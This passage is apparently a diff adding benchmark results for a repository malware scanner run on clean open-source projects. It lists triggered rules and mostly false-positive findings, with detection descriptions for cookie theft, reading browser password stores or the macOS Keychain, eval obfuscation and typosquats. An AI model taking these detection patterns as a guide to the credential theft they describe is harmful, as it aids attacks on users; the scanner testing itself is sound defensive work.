23, + "description": "Suspicious file access detected: Destructive File Deletion" + } + ], + "filesScanned": 100, + "filesSkipped": 34, + "treeTruncated": false, + "durationMs": 2424, + "error": "" + }, + { + "sampleId": "reference-node-fetch", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/node-fetch/node-fetch", + "immutableRef": "8b3320d2a7c07bce4afc6b2bf6c3bbddda85b01f", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 27, + "filesSkipped": 26, + "treeTruncated": false, + "durationMs": 1942, + "error": "" + }, + { + "sampleId": "reference-react", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/facebook/react", + "immutableRef": "c0c39a6b3907eaab35f43074949e2957a2a734c1", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.0375, + "safeToClone": true, + "rulesTriggered": [ + "NETWORK_COMMUNICATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "compiler/apps/playground/components/Icons/IconGitHub.tsx", + "line": 20, + "description": "Suspicious network communication detected: Hardcoded IP Address (2 occurrences)" + } + ], + "filesScanned": 200, + "filesSkipped": 7070, + "treeTruncated": false, + "durationMs": 4591, + "error": "" + }, + { + "sampleId": "reference-vue", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/vuejs/core", + "immutableRef": "9e03beb6b4c85a9d5b49b731c08263aa648e2a2a", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.0375, + "safeToClone": true, + "rulesTriggered": [ + "OBF_NEW_FUNCTION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "packages/compiler-core/src/options.ts", + "line": 312, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "packages/compiler-core/src/validateExpression.ts", + "line": null, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "packages/compiler-dom/src/transforms/stringifyStatic.ts", + "line": 405, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + } + ], + "filesScanned": 200, + "filesSkipped": 503, + "treeTruncated": false, + "durationMs": 2954, + "error": "" + }, + { + "sampleId": "reference-svelte", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/sveltejs/svelte", + "immutableRef": "b4d1583ae20f3869a88a731d9a265c546c099f66", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 8765, + "treeTruncated": false, + "durationMs": 3229, + "error": "" + }, + { + "sampleId": "reference-vite", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/vitejs/vite", + "immutableRef": "fef682d3f067d534a559faf6fd9baedda2e9f8f1", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 2513, + "treeTruncated": false, + "durationMs": 3436, + "error": "" + }, + { + "sampleId": "reference-next", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/vercel/next.js", + "immutableRef": "93249ee06d6e0c105b1278412768c8e0816d9936", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.27, + "safeToClone": true, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "OBF_EVAL", + "OBFUSCATED_CODE", + "EXFIL_COOKIE", + "SUSPICIOUS_FILE_ACCESS", + "CODE_INTEGRITY_ISSUE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": ".github/actions/needs-triage/dist/index.js", + "line": 1, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": ".github/actions/needs-triage/dist/index.js", + "line": 9, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/needs-triage/dist/index.js", + "line": 1, + "description": "Extremely long line detected (340,182 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (127,929 chars, contains suspicious code), Line 7 (135,823 chars, contains suspicious code), Line 8 (284,175 chars, contains suspicious code)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "MALWARE_SIGNATURE", + "rule": "EXFIL_COOKIE", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": 19, + "description": "Reads browser cookies via document.cookie — can steal session tokens" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": 1, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": 1, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": 1, + "description": "Extremely long line detected (283,655 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (266,231 chars, contains suspicious code), Line 15 (120,797 chars, contains suspicious code), Line 16 (283,655 chars, contains suspicious code)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "MALWARE_SIGNATURE", + "rule": "EXFIL_COOKIE", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": 19, + "description": "Reads browser cookies via document.cookie — can steal session tokens" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": 1, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": 1, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": 1, + "description": "Extremely long line detected (283,655 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (266,231 chars, contains suspicious code), Line 15 (120,797 chars, contains suspicious code), Line 16 (283,655 chars, contains suspicious code)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": ".github/actions/next-repo-actions/dist/wrong-issue-template/index.js", + "line": 1, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/next-repo-actions/dist/wrong-issue-template/index.js", + "line": 1, + "description": "Extremely long line detected (284,026 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (283,862 chars, contains suspicious code), Line 2 (283,305 chars, contains suspicious code), Line 3 (116,956 chars, contains suspicious code)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": ".github/actions/pr-auto-label/dist/index.js", + "line": 1, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/pr-auto-label/dist/index.js", + "line": 1, + "description": "Extremely long line detected (284,182 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (277,617 chars, contains suspicious code), Line 2 (284,182 chars, contains suspicious code), Line 3 (70,968 chars, contains suspicious code)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": ".github/actions/upload-turboyet-data/dist/index.js", + "line": 8, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/upload-turboyet-data/dist/index.js", + "line": 8, + "description": "Extremely long line detected (55,653 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 8 (55,653 chars, contains suspicious code)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": ".github/actions/upload-turboyet-data/dist/sourcemap-register.js", + "line": 1, + "description": "Extremely long line detected (41,053 characters). Contains suspicious code patterns like eval/exec/fetch. Malicious code may be hidden far to the right. Affected: Line 1 (41,053 chars, contains suspicious code)" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": 19, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": 19, + "description": "Suspicious file access detected: Destructive File Deletion" + }, + { + "severity": "medium", + "confidence": "low", + "type": "CODE_INTEGRITY_ISSUE", + "rule": "CODE_INTEGRITY_ISSUE", + "file": ".github/actions/next-repo-actions/dist/feature-requests/index.mjs", + "line": null, + "description": "Minified/obfuscated code detected in source repository" + }, + { + "severity": "medium", + "confidence": "low", + "type": "CODE_INTEGRITY_ISSUE", + "rule": "CODE_INTEGRITY_ISSUE", + "file": ".github/actions/next-repo-actions/dist/issues/index.mjs", + "line": null, + "description": "Minified/obfuscated code detected in source repository" + } + ], + "filesScanned": 200, + "filesSkipped": 29628, + "treeTruncated": false, + "durationMs": 10275, + "error": "" + }, + { + "sampleId": "reference-nest", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/nestjs/nest", + "immutableRef": "f2938487c45db149964a8b0efc58a073610dcdf1", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 1928, + "treeTruncated": false, + "durationMs": 3363, + "error": "" + }, + { + "sampleId": "noisy-vscode", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/microsoft/vscode", + "immutableRef": "af2c64423e7ee5d1030a000c82a0bb774d043351", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.2625, + "safeToClone": true, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "CREDENTIAL_THEFT", + "NETWORK_COMMUNICATION", + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "Manual review required; this result is not yet classified as a false positive.", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "build/buildfile.ts", + "line": 16, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "high", + "confidence": "medium", + "type": "MALWARE_SIGNATURE", + "rule": "CREDENTIAL_THEFT", + "file": "build/darwin/sign.ts", + "line": 145, + "description": "Reads browser password databases (Chrome Login Data, Firefox logins.json) or dumps the macOS Keychain via the security(1) command" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "build/filters.ts", + "line": 72, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "build/gulpfile.reh.ts", + "line": 74, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "build/gulpfile.vscode.ts", + "line": 86, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "build/gulpfile.vscode.web.ts", + "line": 70, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "build/azure-pipelines/common/publish.ts", + "line": 598, + "description": "Suspicious network communication detected: Hardcoded IP Address (2 occurrences)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "build/builtin/browser-main.js", + "line": 42, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 16247, + "treeTruncated": false, + "durationMs": 4734, + "error": "" + }, + { + "sampleId": "noisy-playwright", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/microsoft/playwright", + "immutableRef": "2670e5cae0239502d053e530da2c675e5aa536aa", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.11249999999999999, + "safeToClone": true, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "OBFUSCATED_CODE", + "OBF_EVAL", + "DATA_EXFILTRATION", + "NETWORK_COMMUNICATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "browser_patches/firefox/juggler/TargetRegistry.js", + "line": 267, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "packages/html-reporter/src/images.ts", + "line": 17, + "description": "Extremely long line detected (90,767 characters). Malicious code may be hidden far to the right. Affected: Line 17 (90,767 chars)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/injected/src/clock.ts", + "line": 369, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/injected/src/injectedScript.ts", + "line": 247, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "packages/injected/src/recorder/clipPaths.ts", + "line": 30, + "description": "Extremely long line detected (7,049 characters). Malicious code may be hidden far to the right. Affected: Line 30 (7,049 chars)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "packages/injected/src/utilityScript.ts", + "line": 73, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "packages/injected/src/bidiInsertText.ts", + "line": 34, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "packages/injected/src/injectedScript.ts", + "line": 869, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "packages/injected/src/recorder/clipPaths.ts", + "line": 30, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + } + ], + "filesScanned": 200, + "filesSkipped": 3047, + "treeTruncated": false, + "durationMs": 3609, + "error": "" + }, + { + "sampleId": "noisy-cypress", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/cypress-io/cypress", + "immutableRef": "cd8bb88f1080d0ee354e605fadba986b03320828", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.15, + "safeToClone": true, + "rulesTriggered": [ + "TYPOSQUAT_PACKAGE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "unspecified", + "type": "TYPOSQUAT_PACKAGE", + "rule": "TYPOSQUAT_PACKAGE", + "file": "cli/package.json", + "line": null, + "description": "Possible typosquat of \"eslint\": dtslint" + } + ], + "filesScanned": 200, + "filesSkipped": 6980, + "treeTruncated": false, + "durationMs": 4145, + "error": "" + }, + { + "sampleId": "noisy-electron", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/electron/electron", + "immutableRef": "8215b5aa536ec6ae121003bc618bdd825bdbbb0f", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.0375, + "safeToClone": true, + "rulesTriggered": [ + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "docs/fiddles/features/navigation-history/renderer.js", + "line": 20, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "docs/fiddles/ipc/pattern-1/renderer.js", + "line": 4, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "docs/fiddles/system/clipboard/copy/renderer.js", + "line": 5, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 2849, + "treeTruncated": false, + "durationMs": 3442, + "error": "" + }, + { + "sampleId": "noisy-esbuild", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/evanw/esbuild", + "immutableRef": "6ff1d8b0d8c134e867a397eef39702a223ebef9e", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.1275, + "safeToClone": true, + "rulesTriggered": [ + "SUSPICIOUS_FILE_ACCESS", + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "lib/npm/node-install.ts", + "line": 169, + "description": "Suspicious file access detected: System Directory Write" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "pkg/api/api_impl.go", + "line": 2288, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 149, + "treeTruncated": false, + "durationMs": 3536, + "error": "" + }, + { + "sampleId": "noisy-node", + "corpus": "noisy-legitimate", + "label": "reference-clean", + "labelSource": "User-provided scanner-hostile starter set", + "sourceUrl": "https://github.com/nodejs/node", + "immutableRef": "1314579f8c82ed70b8cbe736fdea1df48624c285", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 49533, + "treeTruncated": false, + "durationMs": 4251, + "error": "" + }, + { + "sampleId": "reference-hapijs-hapi", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/hapijs/hapi", + "immutableRef": "d4f93d80e6acadb0000f1cf67f9b1b5992e8a8cc", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 62, + "filesSkipped": 12, + "treeTruncated": false, + "durationMs": 2921, + "error": "" + }, + { + "sampleId": "reference-reduxjs-redux", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/reduxjs/redux", + "immutableRef": "5d65348e26635b6ec627b1030732ed38797e88e9", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.1875, + "safeToClone": true, + "rulesTriggered": [ + "NETWORK_URL_SHORTENER", + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "NETWORK_URL_SHORTENER", + "file": "examples/counter-ts/src/index.tsx", + "line": 22, + "description": "Shortened URLs (bit.ly, tinyurl) in source code — obfuscates actual destination" + }, + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "NETWORK_URL_SHORTENER", + "file": "examples/counter/src/index.js", + "line": 22, + "description": "Shortened URLs (bit.ly, tinyurl) in source code — obfuscates actual destination" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "examples/real-world/src/components/Explore.js", + "line": 21, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "examples/todos-with-undo/src/containers/AddTodo.js", + "line": 13, + "description": "Data exfiltration patterns detected: Form Data Access" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "examples/todos/src/containers/AddTodo.js", + "line": 13, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 276, + "treeTruncated": false, + "durationMs": 3840, + "error": "" + }, + { + "sampleId": "reference-reduxjs-redux-toolkit", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/reduxjs/redux-toolkit", + "immutableRef": "7b269256424e1d44baf83d7de634d9f53931dda7", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 200, + "filesSkipped": 952, + "treeTruncated": false, + "durationMs": 2662, + "error": "" + }, + { + "sampleId": "reference-immerjs-immer", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/immerjs/immer", + "immutableRef": "60ca295e1185db80322ef55ec3fb8475cbc960c7", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.15, + "safeToClone": true, + "rulesTriggered": [ + "NETWORK_URL_SHORTENER" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "NETWORK_URL_SHORTENER", + "file": "src/utils/errors.ts", + "line": 48, + "description": "Shortened URLs (bit.ly, tinyurl) in source code — obfuscates actual destination" + } + ], + "filesScanned": 60, + "filesSkipped": 105, + "treeTruncated": false, + "durationMs": 3009, + "error": "" + }, + { + "sampleId": "reference-date-fns-date-fns", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "Expanded commit-pinned reference corpus", + "sourceUrl": "https://github.com/date-fns/date-fns", + "immutableRef": "4098115cf705e3af7f663d8e5b0686e39a9f478a", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.1275, + "safeToClone": true, + "rulesTriggered": [ + "OBF_EVAL", + "SUSPICIOUS_FILE_ACCESS" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "pkgs/core/examples/cdn/basic.js", + "line": 